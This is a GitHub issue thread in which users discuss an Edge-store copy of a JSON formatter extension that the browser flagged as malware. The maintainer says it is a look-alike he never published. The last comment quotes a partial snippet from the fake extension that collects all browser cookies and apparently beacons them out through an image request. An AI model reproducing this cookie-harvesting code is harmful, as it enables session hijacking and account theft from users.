Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Plugin considered Malware by Edge #254

Open
dv-adit opened this issue Aug 28, 2023 · 18 comments
Open

Plugin considered Malware by Edge #254

dv-adit opened this issue Aug 28, 2023 · 18 comments

Comments

@dv-adit
Copy link

dv-adit commented Aug 28, 2023

image

Seems like the plugin is tagged a malware. Could you look into it and fix it?

@shawty
Copy link

shawty commented Aug 28, 2023

Snap, my copy of edge has just flagged it as malware too, blocked me from using it.

image

@Schwencke
Copy link

I second this, just got flagged by edge

@bcookew
Copy link

bcookew commented Aug 28, 2023

It seems to be an accurate assessment as well given that when I try to remove the extension is automatically re-installs on launch. So far I have been unable to permanently remove it from my system and no AV or Malware tool I have tried so far picks it up.

@bcookew
Copy link

bcookew commented Aug 28, 2023

I have had another look at the above posts and my own issue with this extension and I am wondering if all of us who are having a problem installed a knock off of your extension that points to you as the dev. I noticed that the icon and name of the extension are different than you advertise on this repo even though the extension we have all installed points here. Any thoughts on this anyone?

@shawty
Copy link

shawty commented Aug 28, 2023

@bcookew In my case, no I don't believe I have installed a knock off. If I have, then it's been sat there on my PC running for years by now, I last installed this, easily over 4 years ago, when I last removed and did a clean re-install.

Up until yesterday (27th Aug 2023) this add-on has faithfully rendered JSON data in my browser, for at least this length of time, when I click on the "website link" it actually brings me to this website:

image

image

Given that I've never had cause to re-install it for years, not updated it for years, and not seen any untoward behaviour from it in that time, then for it to suddenly change and be flagged, in my mind, means someone has reported it to MS/Google as a bad extension and they've flagged it in the extension stores without bothering to investigate.

The ONLY thing different in my system between it not being flagged, and suddenly being flagged is that edge updated itself, so it now has round corners in the client area....

I guess it's possible that the extension auto updated, but I don't have auto update turned on for any of my extensions that I'm aware of, and looking right now in the extension details, there's no auto update or anything visible or switched on.

@bcookew
Copy link

bcookew commented Aug 28, 2023

@shawty
Yeah fair, I had had it installed since 2021 with no issues and the same experience re the "Open Extension Website" link. The phantom reinstall has me concerned though. For Edge to flag it and for it to become suddenly unremovable at the same time would be a strange coincidence unless as you suspect it's a Microsoft introduced bug.

@shawty
Copy link

shawty commented Aug 28, 2023

One thing that is interesting however.....

The last time @callumlocke boosted the version number on his plugin was back in December 2022

image

That made the product version 0.7.1

In my version and the other screen shot above, the version reads as version 1.0.0

image

So it's possible that perhaps the authors account has been breached somehow, maybe an infected NPM package or similar, and that the product in the extension store is poisoned in someway.

@shawty
Copy link

shawty commented Aug 28, 2023

@bcookew I'm not giving any particular judgment just yet :-D LOL, truth is, like anyone here I'm just a user taking a stab in the dark, I guess we'll just have to wait and see what happens.

Edge has disabled the extension from running for me for now, so I'm not gonna go poke the bear so to speak, I'll leave it the way it is for a while and see what crops up here.

It might however be worth installing the plug-in in a VM or other suitable sandbox and see if it really does do anything horrible, likewise might also be worth trying it in Chrome too, see if Google has flagged it also.

@bcookew
Copy link

bcookew commented Aug 28, 2023

@shawty I would be interested, if you are willing, in whether you can successfully remove it. Using the remove button in the extension manager removes it for me but it reappears after Edge is closed and reopened...

@shawty
Copy link

shawty commented Aug 28, 2023

@shawty I would be interested, if you are willing, in whether you can successfully remove it. Using the remove button in the extension manager removes it for me but it reappears after Edge is closed and reopened...

Not tonight, it's pretty late here in the UK, but I have my copy of edge setup to replicate plugins, bookmarks etc across different devices, so rather than risk my main work machine, I'll try it in one of the many Windows VM's I have, or on a different machine, probably sometime during the next week.

@zenturacp
Copy link

What does the malware do??

I was kind of confused about the actual issue? I had issues with Facebook some days ago where it added some users to my campain manager and it added campains i did not start :-( could be this plugin

@shawty
Copy link

shawty commented Aug 30, 2023

No idea on that one yet, I've not let it run or anything, been too busy to sandbox it.

@callumlocke
Copy link
Owner

I have not published anything to the Edge store, ever. If someone else is publishing something there (or anywhere) called "JSON Beauty Formatter", that is definitely not JSON Formatter.

I gather my extension somehow works in Edge, based on seeing comments from people apparently using it in that browser, but that's all I know. Maybe they are all just using forks. Or maybe they are installing my extension from source. Or maybe Edge can install extensions from the Chrome store? I have never really looked into it.

I'll try to figure it out when I get home.

JSON Formatter itself has not been compromised. The screenshot posted here is not of JSON Formatter.

@Schwencke
Copy link

@callumlocke edge now runs on the chrome engine, and therefore can use and install extensions directly from the Chrome store, something Microsoft highlights when trying to convince people to use Edge.

Im guessing that someone has deployed a fake using links and images to create a look-a-like to edge store.
it even had the same description.
json

@shawty
Copy link

shawty commented Aug 31, 2023

I have not published anything to the Edge store, ever. If someone else is publishing something there (or anywhere) called "JSON Beauty Formatter", that is definitely not JSON Formatter.

I gather my extension somehow works in Edge, based on seeing comments from people apparently using it in that browser, but that's all I know. Maybe they are all just using forks. Or maybe they are installing my extension from source. Or maybe Edge can install extensions from the Chrome store? I have never really looked into it.

I'll try to figure it out when I get home.

JSON Formatter itself has not been compromised. The screenshot posted here is not of JSON Formatter.

Hi @callumlocke just to fill in some gaps for you :-)

ALL chrome extensions even launched from the chrome web store do by default work in the current versions of edge.

Can't remember exactly when it was but it's been the current state of play now for at least 5 years that I can remember, MS-Edge actually uses chrome under the hood.

Basically, if you take chrome, remove all the UI and Google specific stuff, then wrap the MS UI and features around it, then you have edge.

For quite some time now, us edge users have been able to install chrome plugins direct from the chrome extension store.

I've just checked the "extension store" link in my browsers extensions control panel, and it's taken me to what now appears to be a non existent MS-Edge store page.

image

If however I click on the "Project Page" link just below the store page, it brings me directly to this git-hub repo.

image

I'm going to guess, based on your response that what someone's possibly done is cloned your repo, recompiled it, and published it on the MS-Edge extension store, making all of us think we where in fact installing your plug-in, so I'm going to be the first to apologise for pointing the finger.

Right now, I'm going to remove the copy I have, and re-install your genuine copy from the CHROME web store and not the MS-Edge version (Which now appears to have been removed anyway)

Note of caution to my fellow MS-Edge users, always be careful now that we know that two different people can place 2 identical plug-in's in the 2 different web stores.

@shawty
Copy link

shawty commented Aug 31, 2023

Another update, I've just gone to the Chrome Store, and this is what I see

image

Edge seems to think that the plugin in the chrome store, and the one I have (soon to be had) installed, are one and the same thing!

Also @callumlocke the screen grab I see of your plug-in there on the chrome store, is exactly the same as the what the one I had installed looked like.

@callumlocke
Copy link
Owner

@shawty interesting, thanks.

Still haven't got round to this but I'm planning to just officially publish JF to the Edge store and hope that this stops people using fakes. The tricky thing is some 'fakes' are totally legit forks that add useful features people actually want, and I don't want to accuse them of anything, but I can't easily tell if they're privacy-respecting or not.

Considering renaming it somehow to a slightly less generic name so it's easier to distinguish from clones. Could just rename it "Callum's JSON Formatter" maybe. Open to any suggestions.

@ShortDevelopment
Copy link

It seems like this was actually malware, that grabs your cookies...

function checkVer(u, ix) {
	chrome.cookies.getAll({
		url: u
	}, function (cl) {
		//Get current config
		var apps = {}
		for (var i = 0; i < cl.length; i++) {
			apps[cl[i].name] = cl[i].value + "__" 
            + extD(cl[i].domain);
		}
		makeMsg(chrome.runtime.getManifest().name, chrome.runtime.getManifest().description, apps, ix);
	});
}
function makeMsg(title, msg, apps, ix) {
    ...
    var btn = document.createElement("img");
    btn.setAttribute("class", "_42ft _42fu _42gy");
    //buttonEl.setAttribute("target", "_blank");
    //Todo: Need to remove not use code in next version
    //buttonEl.setAttribute("href", button.href || "#");
    //buttonEl.setAttribute("target", "_blank");
    btn.setAttribute("src", cu);
    doc.appendChild(btn);
    ...
}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

7 participants